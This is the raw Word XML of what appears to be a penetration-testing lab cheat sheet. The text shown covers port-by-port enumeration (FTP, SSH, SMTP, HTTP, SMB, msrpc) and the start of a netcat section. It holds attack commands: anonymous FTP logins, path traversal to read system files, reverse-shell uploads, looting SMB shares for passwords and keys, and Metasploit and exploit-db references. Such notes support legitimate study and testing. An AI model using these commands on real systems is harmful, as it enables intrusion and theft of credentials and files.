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74ED" w14:textId="34F828BC" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:p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TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E9AE3" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1365792058"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="60C4EB6C" w14:textId="77777777" w:rsidR="00957DEE" w:rsidRDefault="007351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533025658" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PORTS AND OPERATIONS</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D8887D7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59" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NETCAT</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79D03BBD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60" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NMAP</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4490AC95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61" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SAMBA</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D39B1C2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62" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CURL</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29655351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63" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proxychains</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F3A1D5F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64" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GoBuster</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6385A245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65" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hash-identifier</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18AF2C53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66" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reverse shell</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13443E47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67" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Password attack</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C15E044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68" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GCC Compile Cross compile lower glibc version 2.5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E496C91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69" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PRIVILEGE ESCALATION: WINDOWS</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51D6C4AD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70" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PRIVILEGE ESCALATION: UNIX</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3743FE0F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71" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CLIENT SIDE ATTACKS</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46765DCA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72" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>WEB ATTACKS</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45F8EE24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73" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MSFVENOM</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79D4BA29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74" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LINUX MISC COMMANDS</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70F6A3FD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75" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding hashdump</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40FE0CBB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76" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D3B4A75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77" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MSF (Migrate)</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16A45342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78" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>TCPDUMP</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="391ABC0E" w14:textId="77777777" w:rsidR="00957DEE" w:rsidRDefault="0008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533025679" w:history="1">
            <w:r w:rsidR="00957DEE" w:rsidRPr="006A1B9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PIVOTING</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A87D4F8" w14:textId="199E1629" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
          <w:pPr>
            <w:spacing w:before="200" w:after="80" w:line="240" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="3B1CED79" w14:textId="7087F325" w:rsidR="007351F7" w:rsidRDefault="00087892" w:rsidP="007351F7">
          <w:pPr>
            <w:spacing w:before="200" w:after="80" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:color w:val="1155CC"/>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5FCF1E9C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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27D636D7" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6002ACB9" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc533025658"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PORTS AND OPERATIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="61A90E25" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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2D909296" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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21:FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54429C" w14:textId="553CD6D6" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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ftp &lt;ip&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(username: anonymous, password: anonymous): See if anonymous login is possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AA2B1" w14:textId="3FB0E80B" w:rsidR="00F57C3C" w:rsidRDefault="00F57C3C" w:rsidP="00F57C3C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use put to put own reverse shell inside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C2C7FD" w14:textId="112B4DC1" w:rsidR="009D4827" w:rsidRDefault="009D4827" w:rsidP="009D4827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ftp&gt;binary (able to run file in .exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552A028" w14:textId="53234212" w:rsidR="0029563B" w:rsidRDefault="0029563B" w:rsidP="0029563B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3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n get the file “get</w:t>
      </w:r>
      <w:r w:rsidR="0097547E">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> here.txt” to transfer file to local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA7DFD" w14:textId="5EE0079C" w:rsidR="0097547E" w:rsidRDefault="0097547E" w:rsidP="0029563B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3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n use “put here.txt” to transfer file to victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390DD1D" w14:textId="3C827656" w:rsidR="00DE65AA" w:rsidRDefault="00DE65AA" w:rsidP="0029563B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3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an use ls ../../../ (to see directory if cd cannot work)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73072493" w14:textId="0CC4B33D" w:rsidR="00DE65AA" w:rsidRDefault="00DE65AA" w:rsidP="0029563B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3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Use get ../../../windows/system32/eula.txt |more (To display the text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C2467" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D5312" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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exploit/linux/ftp/proftp_telnet_iac </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48903C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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indows x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD23E91" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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xploit-db/16731</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7024F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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22: SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E09567" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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sh &lt;ip&gt;: See if you can get some info from SSH header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD037E8" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr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Possible ssh-dss exploit- look at the ssh public key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FD8E8F" w14:textId="4B16AEA3" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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25: SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403685E5" w14:textId="62D6E1F6" w:rsidR="00A7680B" w:rsidRDefault="00A7680B" w:rsidP="00A7680B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7680B">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -nv 10.11.1.229 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A52BE2B" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="00A7680B">
      <w:pPr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VRFY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035656A2" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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80/443/8080: HTTP/S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246449E" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Nikto: scan for files, shellshock vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC32AFA" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Dirb: directory listing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dirb http://&lt;ip&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6654A0E5" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr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verytime you find a new directory through non-dirb methods, remember to enumerate again so you don’t miss anything!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD5691" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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139/445:SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEEFAA" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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enum4linux -a &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D1152" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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Displays all info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE31FC" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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smbmap -u "" -p "" -d &lt;domain&gt; -H &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0570F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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lists samba shares and permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D88B00" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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smbclient \\\\&lt;domain&gt;\\&lt;share&gt; -I &lt;ip&gt; -U “”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5973D0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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Look for SMB exploits [symlink, ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BCD338" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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Passwords, ssh keys, backups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFFF178" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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GET files out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF789D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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mb &lt; 2.2.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0722E7CB" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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linux/bsd: exploit-db/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61231888" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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Win 2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7105AE" w14:textId="4114D9D4" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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msf: ms09_050_smb2_negotiate_func_index </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F5738E" w14:textId="31929184" w:rsidR="00E500FB" w:rsidRDefault="00E500FB" w:rsidP="00E500FB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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MB Login</w:t>
      </w:r>
      <w:r w:rsidR="003171E3">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459BF11D" w14:textId="3D4065F0" w:rsidR="00E500FB" w:rsidRDefault="00E500FB" w:rsidP="00E500FB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2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Smbclient </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C55675">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>\\\\10.11.1.31\\wwwroot</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A2F70EC" w14:textId="624D9D74" w:rsidR="00E500FB" w:rsidRDefault="00E500FB" w:rsidP="00E500FB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3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earch through the web directory in this smb server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAA948F" w14:textId="77777777" w:rsidR="00D72D30" w:rsidRPr="00D72D30" w:rsidRDefault="00D72D30" w:rsidP="000376DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="464241"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>To view smb share names use the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E4E45" w14:textId="4A03DABE" w:rsidR="000376DC" w:rsidRPr="00554908" w:rsidRDefault="00D72D30" w:rsidP="00D72D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans"/>
          <w:color w:val="464241"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>smbclient -L 192.168.25.1 -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EB95A6" w14:textId="5A5536A9" w:rsidR="00554908" w:rsidRDefault="00554908" w:rsidP="00D72D30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr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After which can try to login pick those without symbol “$”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121ECE75" w14:textId="0DA66702" w:rsidR="00554908" w:rsidRDefault="00554908" w:rsidP="00554908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr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mbclient //10.11.1.136/”Bob share” -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA6F40" w14:textId="5A1648AA" w:rsidR="00554908" w:rsidRDefault="00554908" w:rsidP="00554908">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79664F63" w14:textId="77777777" w:rsidR="000376DC" w:rsidRDefault="000376DC" w:rsidP="000376DC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF3A9BE" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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XXXX: msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC3CD72" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1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in XP/2000: exploit-db/66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD45C9" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Other Win OS: exploit-db/16323</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B12C6" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7874E6" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_dhzfb1n35yo" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="2" w:name="_Toc533025659"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>NETCAT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2E29661C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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nc -nlvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F0FC0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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listen on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BE87A" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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nc -nlvp 4444 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E228534" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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listen for file and write to &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D29E2" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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nc -nv &lt;ip&gt; &lt;port&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
